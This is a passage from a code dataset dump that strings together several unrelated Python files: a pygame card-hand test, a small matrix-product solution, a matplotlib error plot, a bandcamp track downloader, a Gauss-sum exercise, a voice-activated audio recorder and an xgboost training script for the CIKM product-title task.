return GraphicHand(cards=cards_of_this_color, name =chosen_color)
def test_graphic_hand():
cards=[]
i=0
for numero in const.liste_numero :
cards.append(GraphicCard(numero,"carreau", position=gconst.area["cards"]["j1"][i]))
i+=1
myhand=GraphicHand(name="Pli",cards=cards)
mypli=GraphicHand(name="Pli",cards=[])
pygame.init()
screen=pygame.display.set_mode(gconst.screen_size)
screen.fill(gconst.GREEN)
pygame.display.flip()
while True:
event = pygame.event.poll()
if event.type == pygame.QUIT or event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE: #escape
break
if event.type == pygame.KEYDOWN and event.key == pygame.K_UP :
myhand.play(screen,player="j1",random=False,pli=mypli,hand=myhand)
if event.type == pygame.KEYDOWN and event.key == pygame.K_1 :
screen.fill(gconst.BLUE,gconst.area["j1"])
if event.type == pygame.KEYDOWN and event.key == pygame.K_2 :
screen.fill(gconst.BLUE,gconst.area["j2"])
if event.type == pygame.KEYDOWN and event.key == pygame.K_3 :
screen.fill(gconst.BLUE,gconst.area["j3"])
if event.type == pygame.KEYDOWN and event.key == pygame.K_4 :
screen.fill(gconst.BLUE,gconst.area["j4"])
if event.type == pygame.KEYDOWN and event.key == pygame.K_5 :
screen.fill(gconst.BLUE,gconst.area["middle"])
if event.type == pygame.KEYDOWN and event.key == pygame.K_6 :
screen.fill(gconst.BLUE,gconst.area["points"])
#if event.type == pygame.KEYDOWN and event.key == pygame.K_7 :
# screen.fill(gconst.BLUE,gconst.area["test"])
if event.type == pygame.KEYDOWN and event.key == pygame.K_9 :
screen.fill(gconst.GREEN)
pygame.display.flip()
pygame.quit()
if __name__=="__main__" :
print("ini and color_sort test")
mycard1=GraphicCard("7","carreau")
mycard2=GraphicCard("7","coeur")
myhand2=GraphicHand(name="Pli",cards=[mycard2,mycard1])
assert(myhand2.name=="Pli")
assert(len(myhand2.cards)==2)
assert(myhand2.points==0)
assert(myhand2.rest["coeur"]==1)
assert(myhand2.rest["cards"]==2)
assert(myhand2.rest["pique"]==0)
assert(myhand2.rest["trefle"]==0)
assert(myhand2.rest["carreau"]==1)
assert(myhand2.cards[0].color=="coeur")
assert(myhand2.cards[1].color=="carreau")
assert(len(myhand2.rest)==5)
myhand=GraphicHand()
assert(myhand.name=="Cards")
assert(len(myhand.cards)==0)
assert(myhand.points==0)
for key in myhand.rest :
assert(myhand.rest[key]==0)
assert(len(myhand.rest)==5)
print("Test OK")
print("assert that test work correctly")
myhand2.test("Pli",1,0,1,0,0)
myhand.test()
print("Test OK")
print("add test")
myhand += myhand2
myhand.test(carreau=1,coeur=1)
print("Test OK")
print("reintialize test")
myhand2.test(name="Pli")
print("Test OK")
print("count_points test")
mycard1.points+=4
mycard2.points+=5
assert(myhand.count_points()==9==myhand.points)
assert(myhand2.count_points()==myhand2.points==0)
pioche =[ GraphicCard(i,j) for j in const.liste_couleur[:4] for i in const.liste_numero]
mypioche=GraphicHand(cards=pioche,name="pioche")
mypioche.test("pioche",8,8,8,8,0)
print("Test OK")
print("color test")
mycolor={}
for color in const.liste_couleur[:4]:
mycolor[color]=mypioche.color(color)
mycolor["coeur"].test(name="coeur",coeur=8)
mycolor["pique"].test(name="pique",pique=8)
mycolor["carreau"].test(name="carreau",carreau=8)
mycolor["trefle"].test(name="trefle",trefle=8)
print("Test OK")
print("remove test")
mypioche.cards[4].rest=False
mypioche.remove_cards()
mypioche.test("pioche",7,8,8,8)
mypioche.cards[4].rest=False
mypioche.cards[7].rest=False
mypioche.remove_cards()
mypioche.test("pioche",6,7,8,8)
print("Test OK")
print("choose test")
for i in range (100):
card=mypioche.choose_card()
assert(card.rest)
print("play_card test")
mycard3=GraphicCard("7","carreau")
mycard4=GraphicCard("7","coeur")
mycard5=GraphicCard("As","coeur")
mycard6=GraphicCard("R","pique")
myhand3=GraphicHand(cards=[mycard3,mycard4])
mypli=GraphicHand(name="Pli", cards=[mycard5,mycard6])
myhand3.play_card(pli=mypli, choosen_card=mycard3)
myhand3.test(coeur=1)
mypli.test("Pli",coeur=1,pique=1,carreau=1)
mypli.play_card(pli=myhand3, choosen_card=mycard3)
mypli.play_card(pli=myhand3, choosen_card=mycard5)
mypli.play_card(pli=myhand3, choosen_card=mycard6)
myhand3.test(coeur=2,pique=1,carreau=1)
mypli.test("Pli")
print("Test OK")
print("winner test")
aspique=GraphicCard("As","pique")
dpique=GraphicCard("D","pique")
septcoeur=GraphicCard("7","coeur")
mypli2=GraphicHand(name="Pli", sort=False, cards=[aspique,dpique,septcoeur])
"atout coeur"
septcoeur.atout=True
aspique.value=8
septcoeur.value=9
dpique.value=5
assert(mypli2.winner()==2)
"atout pique"
septcoeur.atout=False
aspique.atout=True
dpique.atout=True
aspique.value=14
septcoeur.value=1
dpique.value=11
assert(mypli2.winner()==0)
"no atout pique first"
septcoeur.atout=False
aspique.atout=False
dpique.atout=False
aspique.value=8
septcoeur.value=1
dpique.value=5
assert(mypli2.winner()==0)
"no atout coeur first"
mypli3=GraphicHand(name="Pli" ,sort=False, cards=[septcoeur,aspique,dpique])
aspique.value=8
septcoeur.value=1
dpique.value=5
assert(mypli3.winner()==0)
print("Test OK")
print("Check check_card")
myhand=GraphicHand(cards=[aspique,dpique])
assert(myhand.check_card(GraphicCard("As","pique")))
assert(myhand.check_card(GraphicCard("D","pique")))
assert(not myhand.check_card(GraphicCard("7","pique")))
assert(myhand.check_card(aspique))
assert(myhand.check_card(dpique))
print("Test OK")
print("graphic test")
test_graphic_hand()
print("No Test")
| true |
37219cce94ed43b4a64b7c0fe8c75ccc562ce7be | Python | Aasthaengg/IBMdataset | /Python_codes/p02410/s031440077.py | UTF-8 | 258 | 2.734375 | 3 | [] | no_license | n, m = [int(x) for x in input().split()]
a = [[int(x) for x in input().split()] for y in range(n)]
b = [int(input()) for x in range(m)]
c = [0 for i in range(n)]
for i in range(n):
c[i] = sum([a[i][x] * b[x] for x in range(m)])
for i in c:
print(i) | true |
b2705db8e82c063ce9441ae9e3473941021bc06f | Python | b4158813/my-python-journey | /2019 SUPT algorithm/hurricane_ball_slowspeed.py | UTF-8 | 1,744 | 2.625 | 3 | [] | no_license | import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
plt.rcParams['font.sans-serif'] = ['SimHei'] # 正常显示汉字的操作
plt.rcParams['axes.unicode_minus'] = False # 用来正常显示负号的操作
omega = [62.3641, 53.4739, 46.8021,41.6795, 46.7986, 50.4552, 54.4187, 60.8718, 55.9450, 45.3922,
46.8021, 43.1893, 62.8130, 44.1142, 50.0812, 48.8736, 51.4551]
theta_t = [76.989, 80.668, 84.864, 89.512, 84.867, 82.366, 80.192, 77.499, 79.472, 85.990, 84.864, 87.971, 76.842,
87.103, 82.597, 83.380, 81.771]
theta_r = [-76.2, -79.6, -85.2, -87.8, -83.4, -81.0, -78.7, -79.7, -81.1, -85.4, -85.9, -88.6, -79.1, -87.5, -81.1,
-84.7, -78.0]
theta_r = [76.2, 79.6, 85.2, 87.8, 83.4, 81.0, 78.7, 79.7, 81.1, 85.4, 85.9, 88.6, 79.1, 87.5, 81.1, 84.7, 78.0]
error = [-1.025, -1.324, 0.396, -1.913, 1.761, -1.677, -1.877, 2.825, 2.104, -0.671, 1.172, 0.702, 2.896, 0.464, -1.825,
1.579, -4.589]
# plt.bar(omega, theta_t, width=0.3)
# plt.bar(omega, theta_r, width=0.3, alpha=0.5)
plt.plot(omega, error, linestyle='--', marker='o', label='相对误差/%')
# plt.plot(omega, theta_r, marker='o', label='实际曲线')
# plt.plot(omega, theta_t, marker='x', label='理论曲线')
# for a,b in zip(omega,theta_t):
# plt.text(a, b, '%.3f' % b, ha='center', va='bottom', fontsize=15)
# for a, b in zip(omega, theta_r):
# plt.text(a, b, '%.1f' % -b , ha='center', va='bottom', fontsize=15)
for a, b in zip(omega, error):
plt.text(a, b, '%.3f' % b + '%', ha='center', va='bottom', fontsize=15)
plt.xlabel('角速度Ω/(rad/s)', fontsize=15)
plt.ylabel('θ/°', fontsize=15)
plt.tick_params(labelsize=15)
plt.legend(fontsize=15)
plt.show()
| true |
2e025762007638a58c2aa24c68c10095a7f9dd77 | Python | iuliaL/biomeetsinformatics | /Gauss.py | UTF-8 | 332 | 3.90625 | 4 | [] | no_license | # OFF TOPIC
# Summing Integers (to n) Problem
def RecursiveGauss(n):
if n == 0:
return 0
else:
return RecursiveGauss(n-1) + n
print(RecursiveGauss(5))
def GeniusGauss(n):
return n * (n + 1) // 2 # (I can use integer division since n is integer and either n or n+1 is even)
print(GeniusGauss(5))
| true |
3b470117466a88cd128a93d4671747f6940a0ab5 | Python | abbbi/getbandcamp | /getbandcamp.py | UTF-8 | 8,864 | 2.59375 | 3 | [] | no_license | #!/usr/bin/env python
import argparse
import json
import requests
from bs4 import BeautifulSoup
from urllib import quote_plus,unquote
from sys import exit
from os import mkdir, path, makedirs
from ID3 import *
# dont ask, google will help you
BC_API_KEY=""
# see: http://bandcamp.com/developer
BC_API_BANDID="http://api.bandcamp.com/api/band/3/search?key=" + BC_API_KEY + "&name="
BC_API_RECORDS="http://api.bandcamp.com/api/band/3/discography?key=" + BC_API_KEY + "&band_id="
BC_API_ALBUM="http://api.bandcamp.com/api/album/2/info?key=" + BC_API_KEY + "&album_id="
BC_API_TRACKS="http://api.bandcamp.com/api/track/3/info?key=" + BC_API_KEY + "&track_id="
def get_url(url):
try:
resp = requests.get(url=url)
if resp.status_code == requests.codes.ok:
data = resp.content
return data
else:
print "Error fetching page, error:" + str(resp.status_code)
exit(1)
except requests.ConnectionError, e:
print "Error fetching page:" + str(e)
exit(1)
except requests.HTTPError, e:
print "Error reading HTTP response:" + str(e)
def get_json(url, id):
get = url + id
data = get_url(get)
return json.loads(data)
def get_bandname(url):
data = get_url(url)
soup = BeautifulSoup(data)
proplist = soup.find('meta', {"property":'og:site_name', 'content':True})
if proplist:
return proplist['content']
else:
return False
def get_record_tracks(band_id):
data = get_json(BC_API_RECORDS, str(band_id))
record = { 'singles' : {} }
records = []
if data['discography']:
for disc in data['discography']:
if disc.has_key('album_id'):
records.append(disc['album_id'])
elif disc['track_id']:
trackinfo = get_json(BC_API_TRACKS, str(disc['track_id']))
record['singles'][trackinfo['title']] = {}
record['singles'][trackinfo['title']] = { 'url' : trackinfo['streaming_url'] }
#record = {}
for disc_id in records:
disc = get_json(BC_API_ALBUM, str(disc_id))
record[disc['title']] = {}
for track in disc['tracks']:
record[disc['title']][track['title']] = { 'number': track['number'] }
if 'streaming_url' in track:
record[disc['title']][track['title']]['url'] = track['streaming_url']
else:
record[disc['title']][track['title']]['url'] = False
return record
def trackinfo(record_tracks):
print "Found following singles:\n"
if len(record_tracks['singles']) > 0:
for single in record_tracks['singles']:
print single
else:
print "No singles found"
print "\nFound following records:\n"
if len(record_tracks) > 0:
for record in record_tracks:
if record != "singles":
print record
for track in record_tracks[record]:
if record_tracks[record][track]['url'] == False:
print " + " + track + " (not available for download)"
else:
print " + " + track
print "\n"
def download_tracks(tracklist, delimeter, directory, album, band_name):
fixed_album_name = album.replace(" ", delimeter)
fixed_band_name = band_name.replace(" ", delimeter)
count=0
for track in tracklist:
if tracklist[track]['url'] == False:
print "Track: " + track + " is not downloadable through stream, skipping"
continue
if tracklist[track].has_key('number'):
track_id = str(tracklist[track]['number']).zfill(2)
else:
count=count+1
track_id=str(count).zfill(2)
fixed_name = track.replace(" ", delimeter)
target_dir = directory + "/" + fixed_band_name + "/" + fixed_album_name
target_file = target_dir + "/" +track_id + delimeter + fixed_name + ".mp3"
print "Downloading: " + track + " URL: " + tracklist[track]['url'] + " To: " + target_file
if not path.exists(target_dir):
try:
makedirs(target_dir)
except OSError, e:
print "Error creating directory:" + e.strerror
exit(1)
if path.exists(target_file):
print "Skipping, file already exists"
continue
user_agent = {'User-agent': 'Mozilla/5.0'}
try:
r = requests.get(url=tracklist[track]['url'], headers = user_agent)
except requests.ConnectionError, e:
print "Error fetching page:" + str(e)
exit(1)
except requests.HTTPError, e:
print "Error reading HTTP response:" + str(e)
if r.status_code == requests.codes.ok:
try:
with open(target_file, "wb") as fh:
try:
for block in r.iter_content(1024):
try:
fh.write(block)
except IOError,e:
print "Unable to write output data" + str(e.strerror)
exit(1)
except KeyboardInterrupt:
print "aborted"
exit(0)
fh.close
id = ID3(target_file)
id['ARTIST'] = band_name
id['TITLE'] = track
id["ALBUM"] = album
id.write
except IOError, e:
print "Unable to open output file" + str(e.strerror)
else:
print "Error downloading track, http code: " + resp.status_code
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--url", help="URL to bandpage on bandcamp", type=str, required=1)
parser.add_argument("--output", help="destination directory to write files in (default: download)", default="download")
parser.add_argument("--download", help="download stuff, default is only to show records and singles", action="store_true")
parser.add_argument("--singles", help="download only singles", action="store_true")
parser.add_argument("--album", help="download only specified album, default: all", default="all", type=str)
parser.add_argument("--delimeter", help="replace space in filename with specified string, default: '_'", default="_", type=str)
args = parser.parse_args()
if not BC_API_KEY:
print "Error: please set API key"
exit(1)
if not path.exists(args.output):
print "Creating output directory"
try:
mkdir(args.output)
except OSError, e:
print "Error creating directory:" + e.strerror
band_name = get_bandname(args.url)
if band_name != False:
print "Band name: " + band_name
else:
print "Unable to fetch band name from page"
exit(1)
band_data = get_json(BC_API_BANDID, quote_plus(band_name))
if 'error' in band_data:
print "Error fetching band data: " + band_data['error_message']
exit(1)
if len(band_data['results']) > 1:
print "found multiple bands with the same name:"
cnt = 0;
for result in band_data['results']:
print result['url'] + " id: " + str(cnt)
cnt = cnt+1
try:
id = int(raw_input('please enter which band ID to use:'))
print "ID: " + str(id)
except ValueError:
print "Given ID is not an integer"
exit(1)
else:
id=0
try:
band_id = band_data['results'][id]['band_id']
except IndexError:
print "error: cannot find band with given ID"
exit(1)
print "Band API ID " + str(band_id)
record_tracks = get_record_tracks(str(band_id))
if len(record_tracks) > 0:
trackinfo(record_tracks)
else:
print "Bandcamp API did not respond with any records or band has no open records"
exit(1)
if args.download == False and args.singles == False:
exit(1)
if args.singles == True:
if len(record_tracks['singles']) > 0:
download_tracks(record_tracks['singles'], args.delimeter, args.output,"singles", band_name)
exit(0)
else:
print "no singles found for downloading"
exit(1)
if args.album != "all":
if record_tracks.has_key(args.album):
print "\nDownloading album:\n" + args.album
download_tracks(record_tracks[args.album], args.delimeter, args.output,args.album, band_name)
else:
print "Specified album not found in recordlist"
else:
for record in record_tracks:
download_tracks(record_tracks[record], args.delimeter, args.output,record, band_name)
| true |
e8511f4dec7c08fd56818b9a18348a40b5f5c974 | Python | darkmatter999/robotics | /bot_test/flexstream.py | UTF-8 | 4,319 | 2.609375 | 3 | [] | no_license | '''
import pyaudio
import math
import struct
import wave
import sys
#Assuming Energy threshold upper than 30 dB
Threshold = 100
SHORT_NORMALIZE = (1.0/32768.0)
chunk = 1024
FORMAT = pyaudio.paInt16
CHANNELS = 1
RATE = 16000
swidth = 2
Max_Seconds = 10
TimeoutSignal=((RATE / chunk * Max_Seconds) + 2)
silence = True
FileNameTmp = 'output2.wav'
Time=0
all =[]
def GetStream(chunk):
return stream.read(chunk)
def rms(frame):
count = len(frame)/swidth
format = "%dh"%(count)
# short is 16 bit int
shorts = struct.unpack( format, frame )
sum_squares = 0.0
for sample in shorts:
n = sample * SHORT_NORMALIZE
sum_squares += n*n
# compute the rms
rms = math.pow(sum_squares/count,0.5)
return rms * 1000
def WriteSpeech(WriteData):
stream.stop_stream()
stream.close()
p.terminate()
wf = wave.open(FileNameTmp, 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(p.get_sample_size(FORMAT))
wf.setframerate(RATE)
wf.writeframes(WriteData)
wf.close()
def KeepRecord(TimeoutSignal, LastBlock):
all.append(LastBlock)
for i in range(0, TimeoutSignal):
try:
data = GetStream(chunk)
except:
continue
#I chage here (new Ident)
all.append(data)
print ("end record after timeout")
data = ''.join(all)
print ("write to File")
WriteSpeech(data)
silence = True
Time=0
listen(silence,Time)
def listen(silence,Time):
print ("waiting for Speech")
while silence:
try:
input = GetStream(chunk)
except:
continue
rms_value = rms(input)
if (rms_value > Threshold):
silence=False
LastBlock=input
print ("hello I'm Recording....")
KeepRecord(TimeoutSignal, LastBlock)
Time = Time + 1
if (Time > TimeoutSignal):
print ("Time Out No Speech Detected")
sys.exit()
p = pyaudio.PyAudio()
stream = p.open(format = FORMAT,
channels = CHANNELS,
rate = RATE,
input = True,
output = True,
frames_per_buffer = chunk)
listen(silence,Time)
'''
import pyaudio
import math
import struct
import wave
import time
import os
import sys
Threshold = 100
SHORT_NORMALIZE = (1.0/32768.0)
chunk = 1024
FORMAT = pyaudio.paInt16
CHANNELS = 1
RATE = 16000
swidth = 2
TIMEOUT_LENGTH = 5
f_name_directory = r'C:\Users\oliver'
class Recorder:
@staticmethod
def rms(frame):
count = len(frame) / swidth
format = "%dh" % (count)
shorts = struct.unpack(format, frame)
sum_squares = 0.0
for sample in shorts:
n = sample * SHORT_NORMALIZE
sum_squares += n * n
rms = math.pow(sum_squares / count, 0.5)
return rms * 1000
def __init__(self):
self.p = pyaudio.PyAudio()
self.stream = self.p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
output=True,
frames_per_buffer=chunk)
def record(self):
print('Noise detected, recording beginning')
rec = []
current = time.time()
end = time.time() + TIMEOUT_LENGTH
while current <= end:
data = self.stream.read(chunk)
if self.rms(data) >= Threshold: end = time.time() + TIMEOUT_LENGTH
current = time.time()
rec.append(data)
self.write(b''.join(rec))
def write(self, recording):
n_files = len(os.listdir(f_name_directory))
filename = os.path.join(f_name_directory, '{}.wav'.format(n_files))
wf = wave.open(filename, 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(self.p.get_sample_size(FORMAT))
wf.setframerate(RATE)
wf.writeframes(recording)
wf.close()
print('Written to file: {}'.format(filename))
print('Returning to listening')
def listen(self):
print('Listening beginning')
while True:
input = self.stream.read(chunk)
rms_val = self.rms(input)
if rms_val > Threshold:
self.record()
a = Recorder()
a.listen() | true |
5057c8b8f3dc5aedf9047918606e0e7179a8ed6f | Python | NhuanTDBK/cikm17_cup_lazada_product_title | /cikm17_lazada_code/widelearning/conciseness21_3301/xgboost_algorithm.py | UTF-8 | 22,786 | 2.640625 | 3 | [] | no_license | import os, sys, gc, json, pickle
import numpy as np
import pandas as pd
import xgboost as xgb
from sklearn.model_selection import GridSearchCV
from feature_management import FeatureManagement
from data_preparation import DataPreparation
from sklearn.calibration import CalibratedClassifierCV
from sklearn.model_selection import KFold, StratifiedKFold
class XGBoostAlgo(object):
'''
get the current working directory
'''
def __init__(self, max_depth, learning_rate):
self.HOME_DIR = os.path.dirname(os.path.abspath(__file__))
self.MAX_DEPTH = max_depth
self.LEARNING_RATE = learning_rate
'''
this method reads input data from files into Pandas data frames
'''
def get_input_data(self, features, target_column, label):
selected_columns = list(features)
selected_columns.append("label")
selected_columns.append(target_column)
extra_feature_list = ["ct_ratio", "title_num_stopspecialwords", "desc_num_stopspecialwords"]
for column in extra_feature_list:
if column in selected_columns:
selected_columns.remove(column)
if target_column == "conciseness":
if "title_cat1_match_1" in selected_columns:
filename = os.path.join(self.HOME_DIR, "input", "data_ready_w2v_conciseness.csv")
else:
filename = os.path.join(self.HOME_DIR, "input", "data_ready_conciseness.csv")
else:
if "title_cat1_match_1" in selected_columns:
filename = os.path.join(self.HOME_DIR, "input", "data_ready_w2v_clarity.csv")
else:
filename = os.path.join(self.HOME_DIR, "input", "data_ready_clarity.csv")
df_input = pd.read_csv(filename, usecols=selected_columns)
#calculate extra features if needed
if "ct_ratio" in features:
df_input["ct_ratio"] = df_input["ct_common"] / df_input["title_num_words"]
if "title_num_stopspecialwords" in features:
df_input["title_num_stopspecialwords"] = df_input["title_num_stopwords"] + df_input["title_num_specialwords"]
if "desc_num_stopspecialwords" in features:
df_input["desc_num_stopspecialwords"] = df_input["desc_num_stopwords"] + df_input["desc_num_specialwords"]
df_train = df_input[(df_input["label"] == 0)]
df_test = df_input[(df_input["label"] == label)]
#include clarity in df_test if needed
if "clarity" in features:
clarity_filename = os.path.join(self.HOME_DIR, "output", "clarity_valid.predict")
df_test["clarity"] = np.loadtxt(clarity_filename)
print("Total number of features is {}".format(len(df_train.columns)))
print("Total data in df_train, df_test are: {},{}".format(len(df_train), len(df_test)))
return df_train, df_test
'''
use GridSearchCV to find optimal values for parameters in a grid
'''
def tune_parameters(self, df_train, features):
grid_params = {
'subsample':[0.55, 0.65, 0.75],
'colsample_bytree':[0.25, 0.30, 0.35, 0.40],
'colsample_bylevel':[0.4, 0.5, 0.6, 0.7]
}
grid_search = GridSearchCV(estimator=xgb.XGBClassifier(max_depth=self.MAX_DEPTH, \
learning_rate=self.LEARNING_RATE, n_estimators=400, silent=True, \
objective='binary:logistic', nthread=8, gamma=0.1, min_child_weight=1, \
max_delta_step=0, subsample=0.75, colsample_bytree=0.25, colsample_bylevel=0.5, \
reg_alpha=0.1, reg_lambda=1, scale_pos_weight=1, \
base_score=0.685, seed=2017, missing=None),
param_grid=grid_params, scoring='neg_mean_squared_error', iid=False, verbose=2, cv=5)
grid_search.fit(df_train[features], df_train["conciseness"])
print("Done fitting")
print(grid_search.grid_scores_)
print(grid_search.best_params_)
print(grid_search.best_score_)
'''
select indices for training models
'''
def select_index(self, model, value):
if model == value:
return False
else:
return True
'''
train an xgboost model using sklearn API
'''
def train_clarity(self, df_train, features, num_of_models, num_of_rounds, is_calibration = False):
if is_calibration:
print("Calibration")
clarity_model = xgb.XGBClassifier(max_depth=self.MAX_DEPTH, learning_rate=self.LEARNING_RATE, \
n_estimators=num_of_rounds, silent=True, objective='binary:logistic', \
gamma=0.1, min_child_weight=1, max_delta_step=0, \
subsample=0.75, colsample_bytree=0.3, colsample_bylevel=0.5, \
reg_alpha=0.1, reg_lambda=1, scale_pos_weight=1, \
base_score=0.685, seed=2017, missing=None)
clarity_model_calibrated = CalibratedClassifierCV(clarity_model, cv=10, method='isotonic')
clarity_model_calibrated.fit(df_train[features], df_train["clarity"])
return clarity_model_calibrated
print("No calibration")
clarity_models = []
'''
model_count = 1
kf = StratifiedKFold(n_splits=num_of_models, shuffle=True, random_state=2017)
for train_indices, test_indices in kf.split(df_train[features], df_train["clarity"]):
#kf = KFold(n_splits=num_of_models, shuffle=False, random_state=None)
#for train_indices, test_indices in kf.split(df_train):
print("Training model {}".format(model_count))
model_count += 1
x_train = df_train.iloc[train_indices]
x_watch = df_train.iloc[test_indices]
clarity_model = xgb.XGBClassifier(max_depth=self.MAX_DEPTH, learning_rate=self.LEARNING_RATE, \
n_estimators=num_of_rounds, silent=True, objective='binary:logistic', \
gamma=0.1, min_child_weight=1, max_delta_step=0, \
subsample=0.75, colsample_bytree=0.3, colsample_bylevel=0.5, \
reg_alpha=0.1, reg_lambda=1, scale_pos_weight=1, \
base_score=0.943, seed=2017, missing=None)
clarity_model.fit(x_train[features], x_train["clarity"], \
eval_set=[(x_train[features], x_train["clarity"]), (x_watch[features], x_watch["clarity"])], \
eval_metric="rmse", early_stopping_rounds=50)
clarity_models.append(clarity_model)
'''
# create model indices and probablitity distribution
model_indices = [0] * (num_of_models + 1)
model_probabilities = [0.0] * (num_of_models + 1)
leftout_percentage = 1.0 / num_of_models
for i in range(num_of_models):
model_indices[i] = i
model_probabilities[i] = leftout_percentage
model_indices[num_of_models] = num_of_models
model_probabilities[num_of_models] = max(0, 1.0 - leftout_percentage * num_of_models)
print(model_indices)
print(model_probabilities)
random_index = np.random.choice(model_indices, len(df_train), p=model_probabilities)
for model_index in range(num_of_models):
print("Training model %d" % model_index)
train_index = [self.select_index(model_index, i) for i in random_index]
watch_index = [not i for i in train_index]
if num_of_models != 1:
x_train = df_train[train_index]
x_watch = df_train[watch_index]
else:
x_train = df_train
x_watch = df_train
clarity_model = xgb.XGBClassifier(max_depth=self.MAX_DEPTH, learning_rate=self.LEARNING_RATE, \
n_estimators=num_of_rounds, silent=True, objective='binary:logistic', \
gamma=0.1, min_child_weight=1, max_delta_step=0, \
subsample=0.75, colsample_bytree=0.3, colsample_bylevel=0.5, \
reg_alpha=0.1, reg_lambda=1, scale_pos_weight=1, \
base_score=0.943, seed=2017, missing=None)
clarity_model.fit(x_train[features], x_train["clarity"], \
eval_set=[(x_train[features], x_train["clarity"]),
(x_watch[features], x_watch["clarity"])], \
eval_metric="rmse", early_stopping_rounds=50)
clarity_models.append(clarity_model)
return clarity_models
'''
update cat1, 2, 3 values with target encoding
'''
def get_target_encoding_values(self, df_input, col_name, target_name, alpha=5, output_column='y_mean_smooth'):
target_global = df_input[target_name].mean()
df_count = df_input.groupby([col_name])[target_name].count()
df_count = df_count.reset_index()
df_mean = df_input.groupby([col_name])[target_name].mean()
df_mean = df_mean.reset_index()
df_count.columns = [col_name, 'nb_row']
df_mean.columns = [col_name, 'y_mean']
df_ll = pd.merge(df_count, df_mean, on=col_name)
df_ll[output_column] = df_ll.apply(lambda r: 1. * (r['nb_row'] * r['y_mean'] + alpha * target_global) / (r['nb_row'] + alpha), axis=1)
encoding_values = dict(zip(df_ll[col_name], df_ll[output_column]))
return encoding_values
'''
train an xgboost model using sklearn API
'''
def train_concise(self, df_train, features, num_of_models, num_of_rounds, is_target_encoding=False, is_calibration=False):
if is_calibration:
print("Calibration")
concise_model = xgb.XGBClassifier(max_depth=self.MAX_DEPTH, learning_rate=self.LEARNING_RATE, \
n_estimators=num_of_rounds, silent=True, objective='binary:logistic', \
gamma=0.1, min_child_weight=1, max_delta_step=0, \
subsample=0.75, colsample_bytree=0.3, colsample_bylevel=0.5, \
reg_alpha=0.1, reg_lambda=1, scale_pos_weight=1, \
base_score=0.685, seed=2017, missing=None)
concise_model_calibrated = CalibratedClassifierCV(concise_model, cv=10, method='isotonic')
concise_model_calibrated.fit(df_train[features], df_train["conciseness"])
return concise_model_calibrated, []
print("No calibration")
concise_models = []
target_encoding_values = []
# create model indices and probablitity distribution
model_indices = [0] * (num_of_models + 1)
model_probabilities = [0.0] * (num_of_models + 1)
leftout_percentage = 1.0 / num_of_models
for i in range(num_of_models):
model_indices[i] = i
model_probabilities[i] = leftout_percentage
model_indices[num_of_models] = num_of_models
model_probabilities[num_of_models] = max(0, 1.0 -leftout_percentage * num_of_models)
print(model_indices)
print(model_probabilities)
random_index = np.random.choice(model_indices, len(df_train), p=model_probabilities)
for model_index in range(num_of_models):
print("Training model %d" % model_index)
train_index = [self.select_index(model_index, i) for i in random_index]
watch_index = [not i for i in train_index]
if num_of_models != 1:
x_train = df_train[train_index]
x_watch = df_train[watch_index]
else:
x_train = df_train
x_watch = df_train
if is_target_encoding:
encoding_values = self.get_target_encoding_values(x_train, "cat1", "conciseness")
target_encoding_values.append(encoding_values)
for j in range(57):
x_train.loc[(x_train["cat2"] == j), "cat2"] = encoding_values.get(j)
x_watch.loc[(x_watch["cat2"] == j), "cat2"] = encoding_values.get(j)
concise_model = xgb.XGBClassifier(max_depth=self.MAX_DEPTH, learning_rate=self.LEARNING_RATE, \
n_estimators=num_of_rounds, silent=True, objective='binary:logistic', \
gamma=0.1, min_child_weight=1, max_delta_step=0, \
subsample=0.75, colsample_bytree=0.3, colsample_bylevel=0.5, \
reg_alpha=0.1, reg_lambda=1, scale_pos_weight=1, \
base_score=0.685, seed=2017, missing=None)
concise_model.fit(x_train[features], x_train["conciseness"], \
eval_set=[(x_train[features], x_train["conciseness"]), (x_watch[features], x_watch["conciseness"])], \
eval_metric="rmse", early_stopping_rounds=50)
concise_models.append(concise_model)
return concise_models, target_encoding_values
'''
generate predictions for models created from sklearn API
'''
def predict_clarity(self, df_input, clarity_models, features, num_of_models, is_calibration=False):
if is_calibration:
clarity_predictions = np.array(concise_models.predict_proba(df_test[features])[:, 1])
else:
clarity_predictions = np.zeros(len(df_input))
for i in range(num_of_models):
model_predictions = np.array(clarity_models[i].predict_proba(df_input[features])[:,1])
clarity_predictions = clarity_predictions + model_predictions
clarity_predictions = clarity_predictions / num_of_models
clarity_filename = os.path.join(self.HOME_DIR, "output", "clarity_valid.predict")
np.savetxt(clarity_filename, clarity_predictions, fmt='%1.10f', delimiter="\n")
'''
generate predictions for models created from sklearn API
'''
def predict_concise(self, df_test, concise_models, features, num_of_models, target_encoding_values=[], is_calibration=False):
if is_calibration:
concise_predictions = np.array(concise_models.predict_proba(df_test[features])[:, 1])
else:
concise_predictions = np.zeros(len(df_test))
if len(target_encoding_values) == 0:
for i in range(num_of_models):
model_predictions = np.array(concise_models[i].predict_proba(df_test[features])[:, 1])
concise_predictions = concise_predictions + model_predictions
else:
for i in range(num_of_models):
encoding_values = target_encoding_values[i]
for j in range(57):
df_test.loc[(df_test["cat2"] == j), "cat2"] = encoding_values.get(j)
model_predictions = np.array(concise_models[i].predict_proba(df_test[features])[:, 1])
concise_predictions = concise_predictions + model_predictions
concise_predictions = concise_predictions / num_of_models
concise_filename = os.path.join(self.HOME_DIR, "output", "conciseness_valid.predict")
np.savetxt(concise_filename, concise_predictions, fmt='%1.10f', delimiter="\n")
'''
train an xgboost model using sklearn API
'''
def train_separation(self, df_train, target_column, features, num_of_models, num_of_rounds, column="", num_of_cats=0):
concise_models = []
# create model indices and probablitity distribution
model_indices = [0] * (num_of_models + 1)
model_probabilities = [0.0] * (num_of_models + 1)
leftout_percentage = 1.0 / num_of_models
for i in range(num_of_models):
model_indices[i] = i
model_probabilities[i] = leftout_percentage
model_indices[num_of_models] = num_of_models
model_probabilities[num_of_models] = max(0, 1.0 - leftout_percentage * num_of_models)
print(model_indices)
print(model_probabilities)
print("Separation on column {} with {} categories".format(column, num_of_cats))
for j in range(num_of_cats):
sub_models = []
training_features = list(features)
training_features.remove(column)
df_input = df_train[(df_train[column] == j)]
print("Length of df_input {}".format(len(df_input)))
tmp_filename = os.path.join(self.HOME_DIR, "input", "tmp.csv." + str(j))
